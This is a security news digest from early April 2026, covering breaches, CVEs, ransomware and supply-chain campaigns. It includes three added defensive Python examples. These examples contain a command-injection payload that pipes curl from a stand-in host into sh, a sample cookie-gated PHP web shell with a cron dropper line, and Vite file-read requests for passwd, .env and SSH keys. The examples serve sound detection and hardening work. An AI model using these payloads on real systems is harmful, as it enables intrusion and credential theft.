Fri, 03 Apr 2026 18:51:58 +0000
- ShinyHunters issues final warning to Cisco over alleged data theft [net] [social]
ShinyHunters threatens to leak Cisco data by April 3, 2026, claiming access to over three million records obtained through multiple intrusion methods, including social engineering and compromised accounts.
- Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers [net] [mal]
Threat actors deploy cookie-controlled PHP web shells with obfuscation and persistence techniques on Linux servers, requiring strict access controls and monitoring to detect and prevent.
- ICE confirms use of Paragon spyware in drug trafficking cases [mal]
ICE confirmed using Paragon Solutions' spyware in drug and terrorism investigations, despite past controversies and initial suspension over compliance issues.
- Pro-Iran Handala group breached Israeli defence contractor PSK Wind Technologies [ics]
Iran-linked hacker group Handala claimed to breach Israeli defense contractor PSK Wind, amid ongoing Iran-Israel cyber tensions, with a history of high-profile attacks and a $10 million FBI reward.
- Drift Loses $285 Million in Durable Nonce Social Engineering Attack Linked to DPRK [social]
North Korean threat actors carried out a $285 million social engineering attack on the Solana-based exchange Drift, bypassing its multisig controls with pre-signed durable-nonce transactions and laundering the proceeds via Tornado Cash, in what is reported as their eighteenth crypto theft of 2026.
- New SparkCat Variant in iOS, Android Apps Steals Crypto Wallet Recovery Phrase Images [app] [mal]
A new, evolving version of SparkCat malware targets iOS and Android apps to steal cryptocurrency recovery phrases via OCR, employing advanced obfuscation and language-specific tactics, with Chinese-speaking operators behind the threat.
- Adobe Data Breach 2026: Mr. Raccoon Leaks 13M Support Tickets [social]
A threat actor exploited a third-party BPO to exfiltrate 13 million support tickets and sensitive data from Adobe through social engineering and misuse of legitimate tools, highlighting supply chain security risks.
- FBI notified Congress last week of China-linked hack deemed 'major incident' [net]
The FBI disclosed a China-linked intrusion, rated a 'major incident', that targeted sensitive law enforcement data in the Virgin Islands, raising national security concerns amid ongoing U.S.-China tensions.
- ShinyHunters Hackers Claim Theft of 3M+ Cisco Records, Threaten Public Leak [cloud] [social]
ShinyHunters claims to have stolen over 3 million Cisco records via Salesforce and AWS, threatening a public leak if demands are unmet by April 2026, amid unverified claims and previous attacks targeting various industries.
- Drift Protocol estimated to have lost $285M in crypto heist
Drift Protocol, a Solana-based DeFi exchange, suffered a $285 million theft likely due to leaked admin keys, leading to suspension of all transactions.
Fri, 03 Apr 2026 23:37:12 +0000
- DLX7 ShieldNet | Trust Posture Dashboard [app] [net]
A comprehensive security dashboard offering threat detection, framework alignment, real-time insights, and automated response recommendations to enhance organizational cybersecurity posture.
- CVE-2026-33579: OpenClaw Privilege Escalation Fix Guide [app] [exp]
CVE-2026-33579 is a high-severity privilege escalation in OpenClaw versions prior to 2026.3.28: an attacker with pairing access can bypass scope checks to gain full admin control, with unauthenticated or internet-exposed instances most at risk. The fix is to upgrade to 2026.3.28 or later.
- c89cc.sh: standalone C89/ELF64 compiler in pure portable shell [sys]
A portable shell-script-based C89 parser and compiler targeting x86-64 ELF64, with built-in libc, system call implementations, and custom memory management for self-contained C program compilation and execution.
- Claude Code Found a Linux Vulnerability Hidden for 23 Years [exp] [sys]
Nicholas Carlini used AI to uncover a 23-year-old Linux kernel buffer overflow vulnerability in the NFS driver, exemplifying AI's growing role in security research and the potential rise of AI-driven cyber threats.
- Part 2: AWS CodeBuild (Escalating Privileges via AWS CodeConnections) [app] [cloud]
An unprivileged AWS CodeBuild job can retrieve the full GitHub/Bitbucket token behind a CodeConnections connection via undocumented APIs, enabling privilege escalation and repository manipulation; the mitigation is to deny the `GetConnectionToken` permission.
- Public disclosure [social]
A user publicly discloses a security project on GitHub, emphasizing transparency and encouraging independent analysis, while thanking MSRC leadership.
- Remote code execution in CentOS Web Panel (CVE-2025-70951) [app] [exp]
A new RCE vulnerability (CVE-2025-70951) in Control Web Panel on CentOS allows authenticated attackers to inject commands via the addons module's dompath parameter due to insufficient input sanitization, affecting versions 0.9.8.1218 to 0.9.8.1222 and patched in 0.9.8.1224.
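The advisory above describes a request parameter that reaches a shell command without adequate sanitization. As an added illustration of that bug class (not the CWP source, which is PHP; the function names, the `/home` base directory and the payloads are constructed for the example), the Python below places the unsafe pattern beside a hardened version: a character allowlist, rejection of `..` segments, symlink-resolved containment under a base directory, and an argv list so that no shell ever parses the value.

```python
"""Vulnerable and hardened handling of a path-like request parameter such as CWP's "dompath".

Added illustration of the bug class in the advisory, not CWP's code (which is PHP).
The function names, the "/home" base directory and the payloads are constructed.
"""
import os
import re

# Allowlist: an absolute path built only from path-safe characters. Shell metacharacters
# (; | & $ ` space, newline) cannot appear, so nothing can terminate or extend a command.
SAFE_PATH = re.compile(r"^/[A-Za-z0-9._/-]+$")


def vulnerable_command(dompath: str) -> str:
    """Unsafe pattern: the raw parameter is spliced into a command string a shell will parse.

    Returned instead of executed so the injected tail is visible; a real handler would
    hand this string to the shell, which runs everything after the ';' as a second command.
    """
    return f"ls -la {dompath}"


def hardened_argv(dompath: str, base: str = "/home") -> list[str]:
    """Validate dompath and return an argv list that needs no shell at all."""
    if not SAFE_PATH.fullmatch(dompath) or ".." in dompath.split("/"):
        raise ValueError("dompath contains disallowed characters or '..' segments")
    base_real = os.path.realpath(base)
    # Resolve symlinks, then require the result to stay under the base directory.
    # commonpath (not startswith) keeps "/homestead/..." from passing as "/home".
    target = os.path.realpath(dompath)
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("dompath resolves outside the permitted base directory")
    # "--" stops option parsing, so a name beginning with "-" cannot become a flag.
    return ["ls", "-la", "--", target]


def accepts(dompath: str, base: str = "/home") -> bool:
    """True if the hardened validator would let the value through."""
    try:
        hardened_argv(dompath, base)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed attacker input: a valid-looking path followed by an injected command.
    payload = "/home/alice/public_html; curl http://203.0.113.5/x | sh"
    print("vulnerable handler would run:", vulnerable_command(payload))
    print("hardened accepts payload:", accepts(payload))
    print("hardened accepts clean path:", accepts("/home/alice/public_html"))
    print("hardened accepts traversal:", accepts("/home/../etc/passwd"))
```

The important design choice is the last line of `hardened_argv`: once the value is passed as one argv element, quoting becomes irrelevant, whereas escaping the string for a shell (the usual quick patch) only holds until the next character the escape function forgot.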
- GitHub: sooryathejas/METATRON, an AI-powered penetration testing assistant using a local LLM on Linux (Parrot OS) [net] [sys]
Metatron is an offline, CLI-based Linux penetration testing tool that integrates local AI analysis, reconnaissance, and vulnerability management using tools like nmap, nikto, and a fine-tuned LLM, with comprehensive session tracking via MariaDB.
- Blog [net]
HookProbe's blog explores advanced, autonomous edge security solutions leveraging AI, kernel-level protection, and real-time threat detection with technologies like NAPSE, HYDRA, and AEGIS, including deployments on Raspberry Pi for IoT and SMBs.
- BitLocker’s Little Secrets: The Undocumented FVE API [rev] [sys]
Undocumented Windows FVE API exposes volume encryption details to low-privilege users, enabling potential information disclosure and privilege escalation.
Sat, 04 Apr 2026 06:58:07 +0530
- China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.
The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.
'This TA416 activity included multiple
- Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
'Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,
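The pattern in both write-ups of this story above (the Microsoft item earlier on the page and this one) is a web shell whose command channel and access gate are cookies rather than URL parameters or the request body, re-dropped by a cron job if removed. As an added example, not Microsoft's detection logic, the Python below scans PHP source for cookie values that reach an execution sink (directly, or through decoders and an intermediate variable), notes when execution is gated on a cookie check, and flags crontab lines that fetch or write a `.php` file under a web root. The PHP snippets, the crontab and the 203.0.113.10 address are constructed samples.

```python
"""Heuristic scan for cookie-gated PHP web shells and for cron entries that re-drop them.

Added example for the technique described above; it is not Microsoft's detection logic.
The PHP sources and the crontab below are constructed samples.
"""
import re

COOKIE = r"\$_COOKIE\s*\[[^\]]*\]"
DECODERS = r"(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|hex2bin|strrev|urldecode)"
SINKS = r"(?:eval|assert|system|shell_exec|passthru|exec|proc_open|popen|create_function)"

# eval(base64_decode($_COOKIE['c'])): a sink fed a cookie, possibly through nested decoders.
DIRECT = re.compile(rf"\b{SINKS}\s*\((?:\s*{DECODERS}\s*\()*\s*{COOKIE}", re.I)
# $c = base64_decode($_COOKIE['c']): cookie stashed in a variable that may reach a sink later.
ASSIGN = re.compile(rf"(\$[A-Za-z_]\w*)\s*=\s*(?:{DECODERS}\s*\()*\s*{COOKIE}", re.I)
# if (!isset($_COOKIE['k']) || $_COOKIE['k'] !== 'x') { exit; }: execution gated on a cookie.
GATE = re.compile(rf"\bif\s*\(\s*!?\s*(?:isset\s*\(\s*)?{COOKIE}", re.I)


def scan_php(name: str, src: str) -> list[str]:
    findings = []
    for m in DIRECT.finditer(src):
        findings.append(f"{name}: execution sink fed from a cookie: {m.group(0).strip()}")
    for m in ASSIGN.finditer(src):
        var = re.escape(m.group(1))
        # Does the variable holding the cookie value reach a sink later, e.g. @eval($c)?
        if re.search(rf"\b{SINKS}\s*\(\s*(?:{DECODERS}\s*\(\s*)*{var}\b", src, re.I):
            findings.append(f"{name}: cookie value stored in {m.group(1)} reaches an execution sink")
    if findings and GATE.search(src):
        findings.append(f"{name}: execution gated on a cookie check (operator-only access)")
    return findings


WEBROOT_PHP = re.compile(r"(?:/var/www|/srv/www|/usr/share/nginx|/htdocs|/public_html)\S*\.php\b")
# Tools that fetch or write a file. Running a PHP script from cron (php /path/x.php) is
# normal housekeeping and is deliberately not matched.
WRITER = re.compile(r"\b(?:curl|wget|echo|printf|base64|tee|cp|mv|touch)\b")


def scan_crontab(text: str) -> list[str]:
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if WEBROOT_PHP.search(line) and WRITER.search(line):
            hits.append(line)
    return hits


# Constructed sample: answers 404 unless the operator's cookie is present, then evals a second cookie.
MALICIOUS_PHP = r"""<?php
if (!isset($_COOKIE['sess_token']) || $_COOKIE['sess_token'] !== 'x7f2') { header('HTTP/1.1 404 Not Found'); exit; }
$c = base64_decode($_COOKIE['cmd']);
@eval($c);
"""
# Constructed benign cookie use: a language preference, escaped and never executed.
BENIGN_PHP = r"""<?php
$lang = isset($_COOKIE['lang']) ? htmlspecialchars($_COOKIE['lang']) : 'en';
echo "<html lang=\"$lang\">";
"""
CRONTAB = """\
# constructed sample crontab
* * * * * /usr/bin/curl -s http://203.0.113.10/s.txt -o /var/www/html/.cache.php
*/5 * * * * /usr/bin/php /var/www/html/cron/cleanup.php
0 3 * * * /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    for name, src in (("upload.php", MALICIOUS_PHP), ("index.php", BENIGN_PHP)):
        for finding in scan_php(name, src) or [f"{name}: clean"]:
            print(finding)
    for line in scan_crontab(CRONTAB):
        print("cron dropper:", line)
```

Two caveats a practitioner would want: the source scan sees only literal `$_COOKIE` reads, so a shell that copies `$_COOKIE` into another array first, or builds function names from strings, needs the dataflow widened; and the cron check is a triage filter, not a verdict, because a legitimate deploy script that `cp`s a `.php` file into the web root will trip it too.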
- UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly targeted social engineering campaign orchestrated by North Korean threat actors tracked as UNC1069.
Maintainer Jason Saayman said the attackers tailored their social engineering efforts 'specifically to me' by first approaching him under the guise of the founder of a
- Why Third-Party Risk Is the Biggest Gap in Your Clients' Security Posture
The next major breach hitting your clients probably won't come from inside their walls. It'll come through a vendor they trust, a SaaS tool their finance team signed up for, or a subcontractor nobody in IT knows about. That's the new attack surface, and most organizations are underprepared for it.
Cynomi's new guide, Securing the Modern Perimeter: The Rise of Third-Party
- New SparkCat Variant in iOS, Android Apps Steals Crypto Wallet Recovery Phrase Images
Cybersecurity researchers have discovered a new version of the SparkCat malware on the Apple App Store and Google Play Store, more than a year after the trojan was discovered targeting both the mobile operating systems.
The malware has been found to conceal itself within seemingly benign apps, such as enterprise messengers and food delivery services, while
- Drift Loses $285 Million in Durable Nonce Social Engineering Attack Linked to DPRK
Solana-based decentralized exchange Drift has confirmed that attackers drained about $285 million from the platform during a security incident that took place on April 1, 2026.
'Earlier today, a malicious actor gained unauthorized access to Drift Protocol through a novel attack involving durable nonces, resulting in a rapid takeover of Drift’s Security Council administrative powers,' the
- Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials
A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale.
Cisco Talos has attributed the operation to a threat cluster it tracks as
- Cisco Patches 9.8 CVSS IMC and SSM Flaws Allowing Remote System Compromise
Cisco has released updates to address a critical security flaw in the Integrated Management Controller (IMC) that, if successfully exploited, could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system with elevated privileges.
The vulnerability, tracked as CVE-2026-20093, carries a CVSS score of 9.8 out of a maximum of 10.0.
'This
- ThreatsDay Bulletin: Pre-Auth Chains, Android Rootkits, CloudTrail Evasion & 10 More Stories
The latest ThreatsDay Bulletin is basically a cheat sheet for everything breaking on the internet right now. No corporate fluff or boring lectures here, just a quick and honest look at the messy reality of keeping systems safe this week.
Things are moving fast. The list includes researchers chaining small bugs together to create massive backdoors, old software flaws
- Researchers Uncover Mining Operation Using ISO Lures to Spread RATs and Crypto Miners
A financially motivated operation codenamed REF1695 has been observed leveraging fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023.
'Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration,' Elastic
Sat, 04 Apr 2026 03:15:04 +0000
- TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments, (Fri, Apr 3rd)
This is the sixth update to the TeamPCP supply chain campaign threat intelligence report, 'When the Security Scanner Became the Weapon' (v3.0, March 25, 2026). Update 005 covered developments through April 1, including the first confirmed victim disclosure (Mercor AI), Wiz's post-compromise cloud enumeration findings, DPRK attribution of the axios compromise, and LiteLLM's release resumption after Mandiant's forensic audit. This update covers intelligence from April 1 through April 3, 2026.
- ISC Stormcast For Friday, April 3rd, 2026 https://isc.sans.edu/podcastdetail/9878, (Fri, Apr 3rd)
- Attempts to Exploit Exposed 'Vite' Installs (CVE-2025-30208), (Thu, Apr 2nd)
From its GitHub repo: 'Vite (French word for 'quick', pronounced /viːt/, like 'veet') is a new breed of frontend build tooling that significantly improves the frontend development experience' [https://github.com/vitejs/vite].
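CVE-2025-30208 lets a client read files a Vite dev server is configured to deny (`server.fs.deny`) by appending `?raw??` or `?import&raw??` to the URL, which makes Vite treat the request as an import of the file's raw text. As an added example, not the diary's code, the Python below parses combined-format access log lines, flags requests carrying that suffix, rates those aimed at `/@fs/`, traversal or secret files as high, and records whether the server answered 200 (it served the file, so the instance is both exposed and unpatched). The log lines and the 203.0.113.x / 198.51.100.x addresses are constructed.

```python
"""Flag CVE-2025-30208-style file reads against an exposed Vite dev server in access logs.

Added example, not the ISC diary's code. The bypass appends "?raw??" or "?import&raw??" to a URL so
Vite serves the file as a raw string, sidestepping server.fs.deny. The combined-format log lines
below are constructed.
"""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The trailing "??" is the tell: a plain "?raw" is a legitimate Vite import query.
BYPASS_QS = re.compile(r"\?(?:import&)?raw\?\?$", re.I)
# Reads through the /@fs/ handler, traversal, or the files the deny list exists to protect.
SENSITIVE = re.compile(r"(?:/@fs/|\.\./|/etc/(?:passwd|shadow)|\.env\b|id_rsa|\.ssh/|\.pem\b)", re.I)


def classify(target: str) -> Optional[str]:
    """None for a normal request, 'suspect' for the bypass suffix, 'high' if it targets a secret."""
    decoded = unquote(target)  # attackers often percent-encode '?', '&' and '@'
    if not BYPASS_QS.search(decoded):
        return None
    return "high" if SENSITIVE.search(decoded) else "suspect"


def scan(log: str) -> list[dict]:
    findings = []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        severity = classify(m["target"])
        if severity is None:
            continue
        findings.append({
            "ip": m["ip"],
            "path": unquote(m["target"]),
            "severity": severity,
            "served": m["status"] == "200",  # 200 means the server handed the file over
        })
    return findings


def by_source(findings: list[dict]) -> Counter:
    return Counter(f["ip"] for f in findings)


# Constructed sample: one scanner probing three files, one developer doing ordinary work.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2026:09:14:03 +0000] "GET /@fs/etc/passwd?import&raw?? HTTP/1.1" 200 1823 "-" "python-requests/2.31"
203.0.113.7 - - [02/Apr/2026:09:14:04 +0000] "GET /.env?raw?? HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.7 - - [02/Apr/2026:09:14:05 +0000] "GET /%40fs/root/.ssh/id_rsa%3Fimport%26raw%3F%3F HTTP/1.1" 403 0 "-" "python-requests/2.31"
198.51.100.22 - - [02/Apr/2026:09:15:01 +0000] "GET /src/main.ts HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
198.51.100.22 - - [02/Apr/2026:09:15:02 +0000] "GET /src/logo.svg?raw HTTP/1.1" 200 1120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['severity']:7} served={h['served']!s:5} {h['ip']} {h['path']}")
    print("requests per source:", dict(by_source(hits)))
```

A `served=True` line for a `high` finding is the one to act on: rotate whatever was in that file, upgrade Vite to a release that closes the bypass, and stop binding the dev server to a public interface (`--host` or `server.host` set to `0.0.0.0`), since a dev server was never meant to face the internet in the first place.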
- ISC Stormcast For Thursday, April 2nd, 2026 https://isc.sans.edu/podcastdetail/9876, (Thu, Apr 2nd)
- Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)
Today, most malware is described as 'fileless' because it tries to reduce its footprint on the infected computer's filesystem to the bare minimum. But it still needs to write something… think about persistence. It can use the registry as an alternative storage location.
- TeamPCP Supply Chain Campaign: Update 005 - First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)
This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, 'When the Security Scanner Became the Weapon' (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.
- ISC Stormcast For Wednesday, April 1st, 2026 https://isc.sans.edu/podcastdetail/9874, (Wed, Apr 1st)
- Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)
In a cyber incident, most organizations fear data loss (via exfiltration) more than data encryption, because they have a good backup policy in place. If exfiltration has happened, it means a total loss of control over the stolen data, with all the consequences that follow (PII, credit card numbers, …).
- ISC Stormcast For Tuesday, March 31st, 2026 https://isc.sans.edu/podcastdetail/9872, (Tue, Mar 31st)
- TeamPCP Supply Chain Campaign: Update 004 - Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)
This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, 'When the Security Scanner Became the Weapon' (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 -- two days since our last update.
- SongTrivia2 [291,739 breached accounts]
Sat, 04 Apr 2026 01:59:01 Z
- SUCCESS [253,510 breached accounts]
Wed, 01 Apr 2026 06:51:14 Z
- Cuties AI [144,250 breached accounts]
Tue, 31 Mar 2026 06:52:52 Z
- BreachForums Version 5 [339,778 breached accounts]
Fri, 27 Mar 2026 02:19:23 Z
- Scuf Gaming [128,683 breached accounts]
Thu, 26 Mar 2026 05:31:26 Z
- Sound Radix [292,993 breached accounts]
Thu, 26 Mar 2026 00:06:29 Z
- RuneScape Boards [222,762 breached accounts]
Mon, 23 Mar 2026 21:40:06 Z
- Aura [903,080 breached accounts]
Wed, 18 Mar 2026 05:29:58 Z
- Divine Skins [105,814 breached accounts]
Sun, 15 Mar 2026 05:18:40 Z
- Baydöner [1,266,822 breached accounts]
Sun, 15 Mar 2026 03:36:43 Z
- Provecho [712,904 breached accounts]
Tue, 03 Mar 2026 06:40:50 Z
- Lovora [495,556 breached accounts]
Mon, 02 Mar 2026 07:23:06 Z
- Quitbro [22,874 breached accounts]
Mon, 02 Mar 2026 05:27:11 Z
- KomikoAI [1,060,191 breached accounts]
Mon, 02 Mar 2026 01:31:29 Z
- Odido [6,077,025 breached accounts]
Thu, 26 Feb 2026 23:25:29 Z
- Canadian Tire [38,306,562 breached accounts]
Wed, 25 Feb 2026 06:53:25 Z
- CarGurus [12,461,887 breached accounts]
Sun, 22 Feb 2026 04:43:54 Z
- CarMax [431,371 breached accounts]
Fri, 20 Feb 2026 03:48:30 Z
- Figure [967,178 breached accounts]
Wed, 18 Feb 2026 01:11:11 Z
- Canada Goose [581,877 breached accounts]
Tue, 17 Feb 2026 00:19:51 Z